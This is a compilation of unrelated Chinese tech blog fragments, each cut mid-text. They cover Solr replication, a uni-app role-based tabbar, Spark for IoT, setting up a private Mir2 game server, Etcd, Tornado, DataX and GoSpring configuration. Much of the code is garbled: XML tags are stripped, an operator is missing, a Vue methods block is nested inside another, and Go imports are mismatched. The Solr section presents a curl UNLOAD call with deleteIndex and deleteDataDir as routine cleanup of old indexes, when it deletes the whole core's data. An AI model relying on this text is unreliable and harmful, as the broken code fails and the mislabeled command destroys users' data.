...里头可重要了，是保证数据高可用性和一致性的关键。但有时候它也会闹脾气，搞得我们焦头烂额。我呢，也是在最近的一次项目中碰上了这个难题。本来以为复制配置很简单，结果发现坑还挺多的。今天我想跟大家分享一下我遇到的问题和我是怎么解决的，希望对大家有点帮助。 2. 复制的基本概念 首先，咱们得知道复制是什么。简单说，就是把一个Solr服务器上的索引文件拷贝到另一个Solr服务器上，就跟把文件从这个文件夹拖到另一个文件夹那样。这样做有几个好处： - 高可用性：即使某个Solr实例宕机，其他实例仍然可以提供服务。 - 负载均衡：多个副本可以分担查询压力，提高整体性能。 - 数据备份：万一主节点数据丢失，副本可以迅速恢复。 但是，如果复制过程中出现问题，就可能导致数据不一致、服务中断等问题。我碰上的是这么个情况，开始还以为是设置不对，结果捣鼓半天才发现原来是网络的事儿。 3. 常见的复制问题 在实际操作中，我遇到了几个常见的问题，包括但不限于： - 网络延迟或断开：这是最常见的问题之一，特别是在跨数据中心的情况下。 - 配置错误：比如主从节点之间的URL配置错误，或者版本不匹配。 - 磁盘空间不足：复制需要大量的磁盘空间，如果空间不足会导致复制失败。 - 权限问题：某些情况下，权限设置不当也会导致复制失败。 4. 解决方案 针对这些问题，我整理了一些解决方案，希望能帮助大家避免类似的麻烦。 4.1 网络问题 先说说网络问题吧，这可能是最头疼的一个。我碰到的问题是主节点和从节点之间的网络有时候会断开，结果复制任务就卡住了，甚至直接失败。解决方法如下： 1. 检查网络连接 确保主节点和从节点之间网络稳定，可以通过ping命令来测试。 2. 增加重试机制 可以在Solr配置文件中设置重试次数，比如： xml 00:00:30 true 5 60 4.2 配置错误 配置错误也很常见，尤其是对于新手来说。有个小窍门，在配置文件里多加点注释，这样就能大大降低出错的几率啦！比如： xml commit schema.xml,stopwords.txt http://localhost:8983/solr/collection1/replication http://localhost:8983/solr/collection1/replication 00:00:30 4.3 磁盘空间问题 磁盘空间不足也是常见的问题，尤其是在大规模数据量的情况下。解决方法是定期清理旧的索引文件，或者增加磁盘容量。Solr提供了清理旧索引的API，可以定时调用： bash curl http://localhost:8983/solr/collection1/admin/cores?action=UNLOAD&core=collection1&deleteIndex=true&deleteDataDir=true 4.4 权限问题 权限问题通常是因为用户没有足够的权限访问Solr API。解决方法是给相关用户分配正确的角色和权限。例如，在Solr的配置文件中设置用户权限： xml etc/security.json true 然后在security.json文件中添加用户的权限信息： json { "authentication": { "class": "solr.BasicAuthPlugin", "credentials": { "admin": "hashed_password" } }, "authorization": { "class": "solr.RuleBasedAuthorizationPlugin", "permissions": [ { "name": "access-replication-handler", "role": "admin" } ], "user-role": { "admin": ["admin"] } } } 5. 总结 通过上面的分享，希望大家都能够更好地理解和处理Apache Solr中的复制问题。复制虽然重要，但也确实容易出错。但只要我们细心排查，合理配置，还是可以解决这些问题的。如果你也有类似的经历或者更好的解决方案，欢迎在评论区留言交流！ 最后，我想说的是，技术这条路真的是越走越远，每一个问题都是一次成长的机会。希望大家都能在技术之路上越走越远，越走越稳！

... 设置 page.json 3.3 vue 配置 3.4 tabBar组件代码 3.5 setRole方法 1. 需求背景 公司要求开发一个小程序，要求二种不同权限的人群都可以使用，使用时根据不同的权限，获取不同的tabbar，以及展示对应不同的内容。 登录页面分为 用户登录 及 管理员登录 1.2 用户登录和管理员登录的 tabbar 根据账号角色进行对应展示 1.1 源码下载 【源码】uni-app 微信小程序根据角色动态的更改底部tabbar 2. 问题前提及思路 uniapp 本身的动态设置tabbar方法 uni.setTabBarItem(OBJECT)，但是使用这个方法刷新切换时会短暂白屏以及uni.setTabBarItem只能满足动态设置tabbar一项的内容，无法实现多项的需求。所有综合考虑决定还是使用uview-ui的Tabbar底部导航栏组件。 最终选择了uni-app的uview-ui（UI框架）+ vuex来完成这个功能。其中，vuex主要是用来存储当前的tabbar内容的。 3. 开始撸 3.1 设置 tabbar.js 配置不同角色不同的菜单 在utils文件夹下新建一个tabbar.js，来存储不同权限下的底部导航数据。我这里有两种不同的权限，第二种权限比第一种权限多了两项菜单。 // 普通用户tabbarlet tab1 = [{"pagePath": "/pages/loginLogRecord/index","text": "登录记录","iconPath": "/static/icon_bx.png","selectedIconPath": "/static/icon_bx_hover.png"},{"pagePath": "/pages/accessRecord/index","text": "存取记录","iconPath": "/static/icon_adress.png","selectedIconPath": "/static/icon_adress_hover.png"},{"pagePath": "/pages/person/index","text": "我的","iconPath": "/static/icon_user.png","selectedIconPath": "/static/icon_user_hover.png"}]// 管理员用户tabbarlet tab2 = [{"pagePath": "/pages/loginLogRecord/index","text": "登录记录","iconPath": "/static/icon_bx.png","selectedIconPath": "/static/icon_bx_hover.png"},{"pagePath": "/pages/accessRecord/index","text": "存取记录","iconPath": "/static/icon_adress.png","selectedIconPath": "/static/icon_adress_hover.png"},{"pagePath": "/pages/authorizationList/index","text": "授权名单","iconPath": "/static/authorization.png","selectedIconPath": "/static/authorization_hover.png"},{"pagePath": "/pages/inventory/index","text": "盘点","iconPath": "/static/inventory.png","selectedIconPath": "/static/inventory_hover.png"},{"pagePath": "/pages/person/index","text": "我的","iconPath": "/static/icon_user.png","selectedIconPath": "/static/icon_user_hover.png"}]export default [tab1,tab2] 3.2 设置 page.json 在page.json文件里，把tabbar里的几个页面去重放进去。只是单纯的写个路径，什么都不要添加。test，iconPath，selectedIconPath 字段全部删掉这里不需要配置。 "tabBar": {"color": "333333","selectedColor": "328CFA","backgroundColor": "FFFFFF","list": [{"pagePath": "pages/loginLogRecord/index"},{"pagePath": "pages/accessRecord/index"},{"pagePath": "pages/authorizationList/index"},{"pagePath": "pages/inventory/index"},{"pagePath": "pages/person/index"}]} 3.3 vue 配置 uniapp是可以直接使用vuex的，所以，直接在项目的根目录下新建一个store文件夹，存储相关数据。 import Vue from 'vue'import Vuex from 'vuex'Vue.use(Vuex)import tabBar from '@/utils/tabbar.js'const store = new Vuex.Store({state: {wx_token: '',tabBarList: [],roleId: 0, //0 普通员工，1管理员},mutations: {// 设置wx_tokensetWxtoken(state, data) {state.wx_token = data;uni.setStorageSync('wx_token',data)},// 设置用户角色IDsetRoleId(state, data) {state.roleId = data;uni.setStorageSync('roleId',data)state.tabBarList = tabBar[data];uni.setStorageSync('tabBarList',tabBar[data])},},})export default store 在入口文件 main.js 中使用 import Vue from 'vue'import App from './App'import uView from "uview-ui";import store from './store/index'Vue.use(uView);Vue.config.productionTip = falseVue.prototype.$store = storeApp.mpType = 'app'const app = new Vue({...App,store})app.$mount() 3.4 tabBar组件代码 <template><view><u-tabbar :list="tabBarList" :active-color="activeColor" :inactive-color="inactiveColor" :height="84":border-top="borderTop"></u-tabbar></view></template><script>import store from '@/store'export default {props:{tabBarList:{type:Array,default:uni.getStorageSync('tabBarList')} },data() {return {borderTop: true,inactiveColor: '909399',activeColor: '328CFA',} },}</script> 3.5 setRole方法 登录时，获取返回的权限，然后再调用setRole方法 <script>import { mapMutations } from 'vuex';export default {data() {return {roleId:0,};},methods: {methods: {...mapMutations(['setRoleId']),},//登录login() {this.setRoleId(this.roleId)// 0或者1uni.switchTab({url: '../index/index' //然后跳转到登录后的首页})} }}</script> 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_36410795/article/details/109075488。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...park在物联网设备数据同步与协调 1. 引言 嗨，朋友们！今天我们要聊一个超级酷炫的话题——Spark如何帮助我们在物联网设备之间实现高效的数据同步与协调。哎呀，这可是我头一回仔细琢磨这个话题，心里那个激动啊，还带着点小紧张，就跟要上台表演似的。话说回来，Spark这个大数据处理工具，在对付海量数据时确实有一手。不过，说到像物联网设备这种分布广、要求快速响应的情况，事情就没那么简单了。那么，Spark到底能不能胜任这项任务呢？让我们一起探索一下吧！ 2. Spark基础介绍 2.1 Spark是什么？ Spark是一种开源的大数据分析引擎，它能够快速处理大量数据。它的核心是一个叫RDD的东西，其实就是个能在集群里到处跑的数据集，可以让你轻松地并行处理任务。Spark还提供了多种高级API，包括DataFrame和Dataset，它们可以简化数据处理流程。 2.2 为什么选择Spark？ 简单来说，Spark之所以能成为我们的首选，是因为它具备以下优势： - 速度快：Spark利用内存计算来加速数据处理。 - 易于使用：提供了多种高级API，让开发变得更加直观。 - 灵活：支持批处理、流处理、机器学习等多种数据处理模式。 2.3 实战代码示例 假设我们有一个简单的数据集，存储在HDFS上，我们想用Spark读取并处理这些数据。下面是一个简单的Scala代码示例： scala // 导入Spark相关包 import org.apache.spark.sql.SparkSession // 创建SparkSession val spark = SparkSession.builder() .appName("IoT Data Sync") .getOrCreate() // 读取数据 val dataDF = spark.read.format("csv").option("header", "true").load("hdfs://path/to/iot_data.csv") // 显示前5行数据 dataDF.show(5) // 关闭SparkSession spark.stop() 3. 物联网设备数据同步与协调挑战 3.1 数据量大 物联网设备产生的数据量通常是海量的，而且这些数据往往需要实时处理。你可以想象一下，如果有成千上万的传感器在不停地吐数据，那得有多少数字在那儿疯跑啊！简直像海里的沙子一样多。 3.2 实时性要求高 物联网设备的数据往往需要实时处理。比如，在一个智能工厂里，如果传感器没能及时把数据传给中央系统做分析，那可能就会出大事儿，比如生产线罢工或者隐藏的安全隐患突然冒出来。 3.3 设备多样性 物联网设备种类繁多，不同设备可能采用不同的通信协议。这就意味着我们需要一个统一的方式来处理这些异构的数据源。 3.4 网络条件不稳定 物联网设备通常部署在各种环境中，网络条件往往不稳定。这就意味着我们需要的方案得有点抗压能力，在网络不给力的时候还能稳稳地干活。 4. 如何用Spark解决这些问题 4.1 使用Spark Streaming Spark Streaming 是Spark的一个扩展模块，专门用于处理实时数据流。它支持多种数据源，包括Kafka、Flume、TCP sockets等。下面是一个使用Spark Streaming从Kafka接收数据的例子： scala // 创建SparkStreamingContext val ssc = new StreamingContext(spark.sparkContext, Seconds(5)) // 创建Kafka流 val kafkaStream = KafkaUtils.createDirectStream[String, String]( ssc, PreferConsistent, Subscribe[String, String](topicsSet, kafkaParams) ) // 处理接收到的数据 kafkaStream.foreachRDD { rdd => val df = spark.read.json(rdd.map(_.value())) // 进一步处理数据... } // 开始处理流数据 ssc.start() ssc.awaitTermination() 4.2 利用DataFrame API简化数据处理 Spark的DataFrame API提供了一种结构化的方式来处理数据，使得我们可以更容易地编写复杂的查询。下面是一个使用DataFrame API处理数据的例子： scala // 假设我们已经有了一个DataFrame df import spark.implicits._ // 添加一个新的列 val enrichedDF = df.withColumn("timestamp", current_timestamp()) // 保存处理后的数据 enrichedDF.write.mode("append").json("hdfs://path/to/enriched_data") 4.3 弹性分布式数据集（RDD）的优势 Spark的核心概念之一就是RDD。RDD是一种不可变的、分区的数据集合，支持并行操作。这对于处理物联网设备产生的数据特别有用。下面是一个使用RDD的例子： scala // 创建一个简单的RDD val dataRDD = spark.sparkContext.parallelize(Seq(1, 2, 3, 4, 5)) // 对RDD进行映射操作 val mappedRDD = dataRDD.map(x => x 2) // 收集结果 val result = mappedRDD.collect() println(result.mkString(", ")) 4.4 容错机制 Spark的容错机制是其一大亮点。它通过RDD的血统信息（即RDD的操作历史）来重新计算丢失的数据。这就让Spark在处理像物联网设备这样的网络环境不稳定的情况时特别给力。 5. 结论 通过上述讨论，我们可以看到Spark确实是一个强大的工具，可以帮助我们有效地处理物联网设备产生的海量数据。虽说在实际操作中可能会碰到些难题，但只要我们好好设计和优化一下，Spark绝对能搞定这个活儿。希望这篇文章对你有所帮助，也欢迎你在实践中继续探索和分享你的经验！

...问题，很难找到解决的方法，比如架设战神引擎不开门的问题，读取不到列表的问题，等等，今天给大家分享一下架设战神引擎进入游戏不开门的问题怎么解决，提供的主要是解决思路，问题千万种，思路最重要。 导致游戏不开门的问题比较多，帮主把最常见的6个问题列出来，你们自己参照去检查。 1、战神引擎是不是全部启动成功了？ 战神引擎成功启动后，有五个程序，分别是DBServer（数据库）、M2Server（M2控制台）、LoginGate（游戏网关）、GGService（登录网关）、ItemLogServer（日志），这五个程序都在服务器的任务栏上面运行了吗？如果运行了，那么进入第2个。 2、服务器的端口是不是开放了？ 架设战神引擎服务器，默认需要用到的端口有这些，5600、5100、6000、7000、7100、8080、10000、20000、27017(MongoDB芒果数据库)等，这些是战神引擎默认的端口，你看看这些端口在当前架设的服务器上是不是开放了，如果不确定，可以去tool.chinaz.com/port/这个网站扫描看看。 3、引擎里面的IP是否是当前服务器的IP地址？ 战神服务端里面的有4个配置文件需要修改里面的IP地址，分别在是这些文件，把这些文件别人的IP换成架设服务器所在的IP地址。 D:\mud2.0\DBServer\DBService.ini D:\mud2.0\GateServer\GameGate\MirGate.ini D:\mud2.0\GateServer\logingate\LoginGate.ini D:\mud2.0\Mir200\Gs1!Setup.txt 4、引擎里面的端口是不是修改过，在这里帮主推荐使用默认的。 跟第二条一样，引擎尽量使用默认的端口，如果修改了端口，导致引擎相互之间无法连接成功，引擎启动失败，门自然也不会开。 5、列表文件是不是存在 战神引擎列表文件有两份，分别是serverlist.json和serverlist.lua，路径如下，看看是不是有这两份文件。 D:\mud2.0\logincenter\logincenter_win\config\serverlist.json D:\mud2.0\logincenter\logincenter_win\application\controllers\serverlist.lua 这2分文件是否存在，如果存在，那么看第6条，答案就在最上面。 6、列表文件里面的IP、端口、格式是不是正确的(这个导致不开门的原因最多) 按照正常的流程，开门之后，就会出现黄色的列表信息，如下图，没有出现，那么可能serverlist.lua文件有问题，这其中包括了里面的列表格式，这个非常重要，你们在修改的时候，记得只修改里面的IP和游戏名字，端口默认8088即可。更不要添加标点符号等，多一个或少空格都会导致这份文件无法加载，从而出现了不开门的情况，如果开门了，到这里点击进不去，也是因为你修改修改的时候，破坏了标准的Lua格式。 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_43410101/article/details/108263880。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...。 代码示例2：动态读取配置并根据配置调整服务行为。 python import json 获取服务配置 def get_config(service_name): key = f'/config/{service_name}' result = etcd.get(key) if result: return json.loads(result[0].decode()) return {} 根据配置调整服务行为 def adjust_behavior(config): if config.get("debug_mode", False): print("当前处于调试模式") else: print("正常运行模式") 示例调用 config = get_config(service_name) adjust_behavior(config) 四、服务健康检查与负载均衡 保证服务稳定性的关键 为了确保服务的稳定性和高效运行，我们还需要实施健康检查和负载均衡策略。通过Etcd，我们可以定期检查服务节点的状态，并将流量分配给健康的节点，从而提高系统的整体性能和稳定性。 代码示例3：模拟健康检查流程。 python import time 健康检查函数 def health_check(service_name): 模拟检查逻辑，实际场景可能涉及更复杂的网络请求等 print(f"正在进行服务 {service_name} 的健康检查...") time.sleep(2) 模拟耗时 return True 返回服务是否健康 负载均衡策略 def load_balance(service_list): for service in service_list: if health_check(service): return service return None 示例调用 healthy_service = load_balance([f'{service_name}-1', f'{service_name}-2']) print(f"选择的服务为：{healthy_service}") 结语：探索与创新的旅程 通过上述几个方面，我们看到了Etcd在服务治理中的重要作用。从最基本的服务注册和发现，到动态配置管理以及复杂的服务健康检查和负载均衡策略，Etcd简直就是个全能的小帮手，功能强大又灵活多变。当然啦，在实际应用里头，我们还会碰到不少难题，比如说怎么保障安全啊，怎么提升性能啊之类的。但是嘛，只要咱们保持好奇心，敢去探险，肯定能在这个满是奇遇的技术世界里找到自己的路。希望这篇文章能激发你的灵感，让我们一起在服务治理的道路上不断前行吧！

...rnado应用通常会读取配置文件来获取数据库连接信息、监听端口等设置。如果配置文件格式不正确或关键参数缺失，服务自然无法正常启动。 python 示例：从配置文件读取端口信息 import tornadotools.config config = tornadotools.config.load_config('my_config.json') port = config.get('server', {}).get('port', 8000) 如果配置文件中没有指定端口，将默认为8000 然后在启动应用时使用该端口 app.listen(port) 2.2 解决方案 检查配置文件是否符合预期格式且包含所有必需的参数。就像上面举的例子那样，假如你在“my_config.json”这个配置文件里头忘记给'server.port'设定端口值了，那服务就可能因为找不到合适的端口而罢工启动不了，跟你闹脾气呢。 json // 正确的配置文件示例： { "server": { "port": 8888 }, // 其他配置项... } 此外，建议在部署前先在本地环境模拟生产环境测试配置文件的有效性，避免上线后才发现问题。 3. 总结与思考 面对Tornado服务部署过程中可能出现的各种问题，我们需要保持冷静，遵循一定的排查步骤：首先确认基础环境搭建无误（包括依赖安装），然后逐一审查配置文件和其他环境变量。每次成功解决故障，那都是实实在在的经验在手心里攒着呢，而且这每回的过程，都像是咱们对技术的一次深度修炼，让理解力蹭蹭往上涨。 记住，调试的过程就像侦探破案一样，要耐心细致地查找线索，理性分析，逐步抽丝剥茧，最终解决问题。在这个过程中，不断反思和总结，你会发现自己的技术水平也在悄然提升。部署虽然繁琐，但当你看到自己亲手搭建的服务稳定运行时，那种成就感会让你觉得一切付出都是值得的！

...异步编程，不再受限于同步模式，变得更加灵活高效。 两者虽各有特色，但并非竞争关系，而是可以紧密结合，取长补短，共同服务于对性能有极高要求的应用场景。 2. AsyncIO在Tornado中的运用 示例1：在Tornado中直接使用AsyncIO的async/await语法编写异步处理逻辑： python import asyncio import tornado.ioloop import tornado.web class AsyncHandler(tornado.web.RequestHandler): async def get(self): 使用AsyncIO执行耗时操作 await asyncio.sleep(1) self.write("Hello, Async Tornado!") def make_app(): return tornado.web.Application([ (r"/", AsyncHandler), ]) if __name__ == "__main__": app = make_app() app.listen(8888) tornado.ioloop.IOLoop.current().start() 在这段代码中，我们创建了一个异步处理器AsyncHandler，其中的get方法使用了AsyncIO的asyncio.sleep函数模拟耗时操作。虽然Tornado自身本来就有异步功能，但是在最新版的Tornado 6.0及以上版本里，咱们能够超级顺滑地把AsyncIO的异步编程语法融入进去，这样一来，不仅让代码读起来更加通俗易懂，而且极大地简化了程序结构，变得更加清爽利落。 3. 利用AsyncIO优化Tornado网络I/O 虽然Tornado内置了异步HTTP客户端，但在某些复杂场景下，利用AsyncIO的aiohttp库或其他第三方异步库可能会带来额外的性能提升。 示例2：使用aiohttp替代Tornado HTTPClient实现异步HTTP请求： python import aiohttp import tornado.web import asyncio class AsyncHttpHandler(tornado.web.RequestHandler): async def get(self): async with aiohttp.ClientSession() as session: async with session.get('https://api.example.com/data') as response: data = await response.json() self.write(data) def make_app(): return tornado.web.Application([ (r"/fetch_data", AsyncHttpHandler), ]) if __name__ == "__main__": app = make_app() app.listen(8888) loop = asyncio.get_event_loop() tornado.platform.asyncio.AsyncIOMainLoop().install() tornado.ioloop.IOLoop.current().start() 这里我们在Tornado中引入了aiohttp库来发起异步HTTP请求。注意，为了整合AsyncIO到Tornado事件循环，我们需要安装并启动tornado.platform.asyncio.AsyncIOMainLoop。 4. 思考与讨论 结合AsyncIO优化Tornado性能的过程中，我们不仅获得了更丰富、更灵活的异步编程工具箱，而且能更好地利用操作系统级别的异步I/O机制，从而提高资源利用率和系统吞吐量。当然，具体采用何种方式优化取决于实际应用场景和需求。 总的来说，Tornado与AsyncIO的联姻，无疑为Python高性能Web服务的开发注入了新的活力。在未来的发展旅程上，我们热切期盼能看到更多新鲜、酷炫的创新和突破，让Python异步编程变得更加给力，用起来更顺手，实力也更强大。就像是给它插上翅膀，飞得更高更快，让编程小伙伴们都能轻松愉快地驾驭这门技术，享受前所未有的高效与便捷。

...高性能、稳定且易用的数据同步工具，以其强大的异构数据源处理能力广受业界好评。然而，在大规模数据迁移和同步过程中，安全性问题同样是我们不容忽视的关键要素。这篇东西，咱们主要就来掰扯掰扯Datax在安全性这块的那些门道，我将带你通过一些实打实的代码例子，一块儿抽丝剥茧看看它的安全机制到底是怎么运作的。同时，咱也不光讲理论，还会结合实际生活、工作中的应用场景，实实在在地讨论讨论这个话题。 1. 数据传输安全 在跨系统、跨网络的数据同步场景中，Datax的通信安全至关重要。Datax默认会用类似HTTPS这样的加密协议，给传输的数据穿上一层厚厚的保护壳，就像是数据的“加密铠甲”，这样一来，甭管数据在传输过程中跑得多远、多快，都能确保它的内容既不会被偷窥，也不会被篡改，完完整整、安安全全地到达目的地。 json { "job": { "content": [ { "reader": { "name": "mysqlreader", "parameter": { "username": "root", "password": "", "connection": [ { "jdbcUrl": ["jdbc:mysql://source-db:3306/mydb?useSSL=true&serverTimezone=UTC"], "table": ["table1"] } ], // 配置SSL以保证数据传输安全 "connectionProperties": "useSSL=true" } }, "writer": {...} } ], "setting": { // ... } } } 上述示例中，我们在配置MySQL读取器时启用了SSL连接，这是Datax保障数据传输安全的第一道防线。 2. 认证与授权 Datax服务端及各数据源间的认证与授权也是保障安全的重要一环。Datax本身并不内置用户权限管理功能，而是依赖于各个数据源自身的安全机制。例如，我们可以通过配置数据库的用户名和密码实现访问控制： json "reader": { "name": "mysqlreader", "parameter": { "username": "datax_user", // 数据库用户 "password": "", // 密码 // ... } } 在此基础上，企业内部可以结合Kerberos或LDAP等统一身份验证服务进一步提升Datax作业的安全性。 3. 敏感信息处理 Datax配置文件中通常会包含数据库连接信息、账号密码等敏感内容。为防止敏感信息泄露，Datax支持参数化配置，通过环境变量或者外部化配置文件的方式避免直接在任务配置中硬编码敏感信息： json "reader": { "name": "mysqlreader", "parameter": { "username": "${db_user}", "password": "${}", // ... } } 然后在执行Datax任务时，通过命令行传入环境变量： bash export db_user='datax_user' && export db_password='' && datax.py /path/to/job.json 这种方式既满足了安全性要求，也便于运维人员管理和分发任务配置。 4. 审计与日志记录 Datax提供详细的运行日志功能，包括任务启动时间、结束时间、状态以及可能发生的错误信息，这对于后期审计与排查问题具有重要意义。同时呢，我们可以通过企业内部那个专门用来收集和分析日志的平台，实时盯着Datax作业的执行动态，一旦发现有啥不对劲的地方，就能立马出手解决，保证整个流程顺顺利利的。 综上所述，Datax的安全性设计涵盖了数据传输安全、认证授权机制、敏感信息处理以及操作审计等多个层面。在用Datax干活的时候，咱们得把这些安全策略整得明明白白、运用自如。只有这样，才能一边麻溜儿地完成数据同步任务，一边稳稳当当地把咱的数据资产保护得严严实实，一点儿风险都不冒。这就像是现实生活里的锁匠师傅，不仅要手到擒来地掌握开锁这门绝活儿，更得深谙打造铜墙铁壁般安全体系的门道，确保我们的“数据宝藏”牢不可破，固若金汤。

...何通过DataX实现数据同步的多线程处理 1. 引言 在大数据的世界里，数据同步是一个永恒的话题。不管你是要把数据从数据库搬到HDFS，还是要从CSV文件导入数据库，咱们总是得找条又快又稳的路子，确保数据完好无损。DataX就是一个神器，用它我们可以轻松搞定不同平台之间的数据同步。嘿，你知道吗？DataX 其实还能用多线程来处理呢，这样能大大加快数据同步的速度！嘿，今天咱们一起来搞点好玩的！我要教你如何用DataX的多线程功能让你的数据同步快到飞起！ 2. DataX的基本概念 在深入多线程之前，我们先来了解一下DataX的基础知识。DataX是一个开源项目，由阿里巴巴集团开发并维护。它的核心功能是实现异构数据源之间的高效同步。简单来说，DataX可以让你在各种不同的数据存储之间自由迁移数据，而不用担心数据丢失或损坏。 举个例子，假设你有一个MySQL数据库，里面保存了大量的用户信息。现在你想把这些数据迁移到Hadoop集群中，以便进行大数据分析。这时候，DataX就能派上用场了。你可以配置一个任务，告诉DataX从MySQL读取数据，并将其写入HDFS。是不是很神奇？ 3. 多线程处理的必要性 在实际工作中，我们经常会遇到数据量非常大的情况。比如说，你可能得把几百GB甚至TB的数据从这个系统倒腾到另一个系统。要是用单线程来做，恐怕得等到猴年马月才能搞定！所以，咱们得考虑用多线程来加快速度。多线程可以在同一时间内执行多个任务，从而大大缩短处理时间。 想象一下，如果你有一大堆文件需要上传到服务器，但你只有一个线程在工作。那么每次只能上传一个文件，速度肯定慢得让人抓狂。用了多线程，就能同时传好几个文件，效率自然就上去了。同理，在数据同步领域，多线程处理也能显著提升性能。 4. 如何配置DataX的多线程处理 现在，让我们来看看如何配置DataX以启用多线程处理。首先，你需要创建一个JSON配置文件。在这份文件里，你要指明数据从哪儿来、要去哪儿，还得填一些关键设置，比如说线程数量。 json { "job": { "content": [ { "reader": { "name": "mysqlreader", "parameter": { "username": "root", "password": "123456", "connection": [ { "jdbcUrl": ["jdbc:mysql://localhost:3306/testdb"], "table": ["user_info"] } ] } }, "writer": { "name": "hdfswriter", "parameter": { "defaultFS": "hdfs://localhost:9000", "fileType": "text", "path": "/user/datax/user_info", "fileName": "user_info.txt", "writeMode": "append", "column": [ "id", "name", "email" ], "fieldDelimiter": "\t" } } } ], "setting": { "speed": { "channel": 4 } } } } 在这段配置中，"channel": 4 这一行非常重要。它指定了DataX应该使用多少个线程来处理数据。这里的数字可以根据你的实际情况调整。比如说，如果你的电脑配置比较高，内存和CPU都很给力，那就可以试试设大一点的数值，比如8或者16。 5. 实战演练 为了更好地理解DataX的多线程处理，我们来看一个具体的实战案例。假设你有一个名为 user_info 的表，其中包含用户的ID、姓名和邮箱信息。现在你想把这部分数据同步到HDFS中。 首先，你需要确保已经安装并配置好了DataX。接着，按照上面的步骤创建一个JSON配置文件。这里是一些关键点： - 数据库连接：确保你提供的数据库连接信息（用户名、密码、JDBC URL）都是正确的。 - 表名：指定你要同步的表名。 - 字段列表：列出你要同步的字段。 - 线程数：根据你的需求设置合适的线程数。 保存好配置文件后，就可以运行DataX了。打开命令行，输入以下命令： bash python datax.py /path/to/your/config.json 注意替换 /path/to/your/config.json 为你的实际配置文件路径。运行后，DataX会自动启动指定数量的线程来处理数据同步任务。 6. 总结与展望 通过本文的介绍，你应该对如何使用DataX实现数据同步的多线程处理有了初步了解。多线程不仅能加快数据同步的速度，还能让你在处理海量数据时更加得心应手，感觉轻松不少。当然啦，这仅仅是DataX功能的冰山一角，它还有超多酷炫的功能等你来探索呢！ 希望这篇文章对你有所帮助！如果你有任何问题或建议，欢迎随时留言交流。我们一起探索更多有趣的技术吧！

...v变量，可以方便地读取和设置环境变量。例如： go package main import ( "fmt" "os" ) func main() { // 读取环境变量 environment := os.Getenv("ENVIRONMENT") fmt.Printf("当前环境为：%s\n", environment) // 设置环境变量 os.Setenv("ENVIRONMENT", "production") environment = os.Getenv("ENVIRONMENT") fmt.Printf("设置后的环境为：%s\n", environment) } 这段代码展示了如何读取和设置环境变量。哎呀，你知道吗？在咱们的实际操作里，这些变量就像魔法师的魔法棒一样，能帮我们区分出开发、测试、生产这些不同的工作环境。就像是在厨房里，你有专门的调料盒来放做菜时需要用到的不同调料，这样就能确保每道菜的味道都刚刚好。咱们这些变量也是这么个道理，它们帮助我们确保在不同环境下程序运行得既稳定又高效！ 三、配置文件的集成 配置文件是存储应用配置信息的一种常见方式。GoSpring通过内置的配置解析器，支持读取JSON、YAML或XML格式的配置文件。下面是一个简单的JSON配置文件示例： json { "app": { "name": "MyApp", "version": "1.0.0", "environment": "development" }, "database": { "host": "localhost", "port": 5432, "username": "myuser", "password": "mypassword", "dbname": "mydb" } } 在Go代码中，我们可以使用yaml或json包来解析这个配置文件： go package main import ( "encoding/json" "fmt" "io/ioutil" "log" "github.com/spf13/viper" ) func main() { viper.SetConfigFile("config.json") // 设置配置文件路径 if err := viper.ReadInConfig(); err != nil { // 读取配置文件 log.Fatalf("Error reading config file: %v", err) } // 获取配置数据 appName := viper.GetString("app.name") appVersion := viper.GetString("app.version") dbHost := viper.GetString("database.host") fmt.Printf("应用名称：%s, 版本：%s, 数据库主机：%s\n", appName, appVersion, dbHost) } 通过这种方式，我们可以在不修改代码的情况下，通过更改配置文件来改变应用的行为，极大地提高了应用的可维护性和灵活性。 四、整合环境变量与配置文件 在实际项目中，通常会结合使用环境变量和配置文件来实现更复杂的配置管理。例如，可以通过环境变量来控制配置文件的加载路径，或者根据环境变量的值来选择使用特定的配置文件： go package main import ( "os" "path/filepath" "testing" "github.com/spf13/viper" ) func main() { // 设置环境变量 os.Setenv("CONFIG_PATH", "path/to/your/config") // 读取配置文件 viper.SetConfigType("yaml") // 根据你的配置文件类型进行设置 viper.AddConfigPath(os.Getenv("CONFIG_PATH")) // 添加配置文件搜索路径 err := viper.ReadInConfig() if err != nil { log.Fatalf("Error reading config file: %v", err) } // 获取配置数据 // ... } 通过这种方式，我们可以根据不同环境（如开发、测试、生产）使用不同的配置文件，同时利用环境变量动态调整配置路径，实现了高度灵活的配置管理。 结语 GoSpring框架通过支持环境变量和配置文件的集成，为开发者提供了强大的工具来管理应用配置。哎呀，这种灵活劲儿啊，可真是帮了大忙！它就像个魔法师，能让你的开发工作变得轻松愉快，效率嗖嗖的往上窜。而且，别看它这么灵巧，稳定性却是一点儿也不含糊。不管是在哪个环境里施展它的魔法，都能保持一贯的好状态，稳如泰山。这就像是你的小伙伴，无论走到哪儿，都能给你带来安全感和惊喜，你说赞不赞？哎呀，兄弟，你懂的，现在咱们的应用就像个大家庭，人多了，事儿也杂了，对吧？这时候，怎么管好这个家庭，让每个人都各司其职，不乱套，就显得特别重要了。这就得靠咱们合理的配置管理策略来搞定。比如说，得有个清晰的分工，谁负责啥，一目了然；还得有规矩，比如更新软件得按流程来，不能随随便便；还得有监控，随时看看家里人都在干啥，有问题能及时发现。这样，咱们的应用才能健健康康地成长，不出岔子。所以，合理的配置管理策略，简直就是咱们应用界的定海神针啊！嘿，兄弟！这篇文章就是想给你开开小灶，让你能轻松掌握 GoSpring 在配置管理这块儿的厉害之处。别担心，我不会用一堆冰冷的术语把你吓跑，咱俩就像老朋友聊天一样，把这玩意儿讲得跟吃饭喝水一样简单。跟着我，你就能发现 GoSpring 配置管理有多牛逼，怎么用都顺手，让你的工作效率嗖嗖地往上涨！咱们一起探索，一起享受技术带来的乐趣吧！

